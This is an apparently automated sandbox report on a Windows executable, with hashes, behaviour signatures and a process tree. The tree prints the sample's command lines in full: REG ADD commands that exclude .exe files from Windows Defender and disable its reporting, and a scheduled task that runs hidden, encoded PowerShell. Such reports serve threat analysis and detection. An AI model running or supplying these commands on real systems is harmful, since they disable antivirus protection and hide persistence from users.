Analysis
- max time kernel: 10s
- max time network: 15s
- platform: windows10-2004_x64
- resource: win10v2004-20231020-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231020-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29/10/2023, 22:01
Static task: static1
Behavioral task: behavioral1
- Sample: b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe
- Resource: win10v2004-20231020-en
General
- Target: b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe
- Size: 7.3MB
- MD5: aa1ea1ddc7e58eb23593b1a9a2bf1293
- SHA1: cfea2b88f2abc426ef066550817b1729295898f0
- SHA256: b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7
- SHA512: 4a7ff88bded2cf2a095b6903c345076269f691ed82f4c8abd68c9c13159d22837f270c1dfb681af81e01750dc9f6083920595ef8a80de93d38b11d2a519b27fd
- SSDEEP: 196608:91Ow47moHXAOm3vNPANBLr/8m2iXLcqsLfK3j:3ObmoHX5mNorr/Vuaz
Malware Config
Signatures
- Checks BIOS information in registry (2 TTPs, 1 IoC)
  BIOS information is often read in order to detect sandboxing environments.
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (process: Install.exe)
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation (process: Install.exe)
- Executes dropped EXE (2 IoCs)
  pid 1672: Install.exe
  pid 1956: Install.exe
- Drops file in System32 directory (1 IoC)
  File created: C:\Windows\system32\GroupPolicy\gpt.ini (process: Install.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 1684: schtasks.exe
- Enumerates system info in registry (2 TTPs, 2 IoCs)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (process: Install.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (process: Install.exe)
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 4476: powershell.EXE
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 4476: powershell.EXE
- Suspicious use of WriteProcessMemory (36 IoCs)
  PID 3280 wrote to memory of 1672 (pid 3280, process b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe, procid_target 88)
  PID 3280 wrote to memory of 1672 (pid 3280, process b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe, procid_target 88)
  PID 3280 wrote to memory of 1672 (pid 3280, process b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe, procid_target 88)
  PID 1672 wrote to memory of 1956 (pid 1672, process Install.exe, procid_target 90)
  PID 1672 wrote to memory of 1956 (pid 1672, process Install.exe, procid_target 90)
  PID 1672 wrote to memory of 1956 (pid 1672, process Install.exe, procid_target 90)
  PID 1956 wrote to memory of 2684 (pid 1956, process Install.exe, procid_target 96)
  PID 1956 wrote to memory of 2684 (pid 1956, process Install.exe, procid_target 96)
  PID 1956 wrote to memory of 2684 (pid 1956, process Install.exe, procid_target 96)
  PID 1956 wrote to memory of 3924 (pid 1956, process Install.exe, procid_target 98)
  PID 1956 wrote to memory of 3924 (pid 1956, process Install.exe, procid_target 98)
  PID 1956 wrote to memory of 3924 (pid 1956, process Install.exe, procid_target 98)
  PID 2684 wrote to memory of 1168 (pid 2684, process forfiles.exe, procid_target 100)
  PID 2684 wrote to memory of 1168 (pid 2684, process forfiles.exe, procid_target 100)
  PID 2684 wrote to memory of 1168 (pid 2684, process forfiles.exe, procid_target 100)
  PID 3924 wrote to memory of 2864 (pid 3924, process forfiles.exe, procid_target 101)
  PID 3924 wrote to memory of 2864 (pid 3924, process forfiles.exe, procid_target 101)
  PID 3924 wrote to memory of 2864 (pid 3924, process forfiles.exe, procid_target 101)
  PID 1168 wrote to memory of 4212 (pid 1168, process cmd.exe, procid_target 102)
  PID 1168 wrote to memory of 4212 (pid 1168, process cmd.exe, procid_target 102)
  PID 1168 wrote to memory of 4212 (pid 1168, process cmd.exe, procid_target 102)
  PID 2864 wrote to memory of 704 (pid 2864, process cmd.exe, procid_target 103)
  PID 2864 wrote to memory of 704 (pid 2864, process cmd.exe, procid_target 103)
  PID 2864 wrote to memory of 704 (pid 2864, process cmd.exe, procid_target 103)
  PID 1168 wrote to memory of 3736 (pid 1168, process cmd.exe, procid_target 104)
  PID 1168 wrote to memory of 3736 (pid 1168, process cmd.exe, procid_target 104)
  PID 1168 wrote to memory of 3736 (pid 1168, process cmd.exe, procid_target 104)
  PID 2864 wrote to memory of 4988 (pid 2864, process cmd.exe, procid_target 105)
  PID 2864 wrote to memory of 4988 (pid 2864, process cmd.exe, procid_target 105)
  PID 2864 wrote to memory of 4988 (pid 2864, process cmd.exe, procid_target 105)
  PID 1956 wrote to memory of 1684 (pid 1956, process Install.exe, procid_target 107)
  PID 1956 wrote to memory of 1684 (pid 1956, process Install.exe, procid_target 107)
  PID 1956 wrote to memory of 1684 (pid 1956, process Install.exe, procid_target 107)
  PID 1956 wrote to memory of 3196 (pid 1956, process Install.exe, procid_target 110)
  PID 1956 wrote to memory of 3196 (pid 1956, process Install.exe, procid_target 110)
  PID 1956 wrote to memory of 3196 (pid 1956, process Install.exe, procid_target 110)
Processes
- C:\Users\Admin\AppData\Local\Temp\b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe"
  PID: 3280
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\7zS89F0.tmp\Install.exe
    Command line: .\Install.exe
    PID: 1672
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\7zS8ED2.tmp\Install.exe
      Command line: .\Install.exe /HdidY "385118" /S
      PID: 1956
      Signatures: Checks BIOS information in registry; Checks computer location settings; Executes dropped EXE; Drops file in System32 directory; Enumerates system info in registry; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        PID: 2684
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          PID: 1168
          Signatures: Suspicious use of WriteProcessMemory
          - \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            PID: 4212
          - \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            PID: 3736
      - C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        PID: 3924
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          PID: 2864
          Signatures: Suspicious use of WriteProcessMemory
          - \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            PID: 704
          - \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            PID: 4988
      - C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "gRDqhgJub" /SC once /ST 18:38:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        PID: 1684
        Signatures: Creates scheduled task(s)
      - C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /run /I /tn "gRDqhgJub"
        PID: 3196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  PID: 4476
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 6.1MB
  MD5: 7a828b58479734ae420fecc12a00b474
  SHA1: 88d685d7de97ab4c1ef5c2524ab15d3a03c9eb36
  SHA256: 02080ebd09414905472e0f8c52c8b964bc578e72057ead60fdd44fa955e2ff4b
  SHA512: c8a116cd359c8f5ba7dbe8341e34f217b7ce2079a34eeecb51c5352a9a0af6598ff55bf39c41b48d82909f0410baa4de9b84e848d11f0dd4dedb1f9ad48a3df5
- Filesize: 6.8MB
  MD5: 5ea24b94d60ba9cc83b4832930d4a193
  SHA1: 669e5df0dfae166acb9b6714b845ebf5b52b8a44
  SHA256: 6feb6821d956a8d128d74d814d833900b5b9d41b3fa001d3b47556ab8119b236
  SHA512: 61b8bd7ffca87241e55bfbbea5471a53355b332339c6a62593fb6c0632e42e61d1fce4c6294e08c5ac69e31b8a2f7e01d1bff22097f5b2942c5f948579489516
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82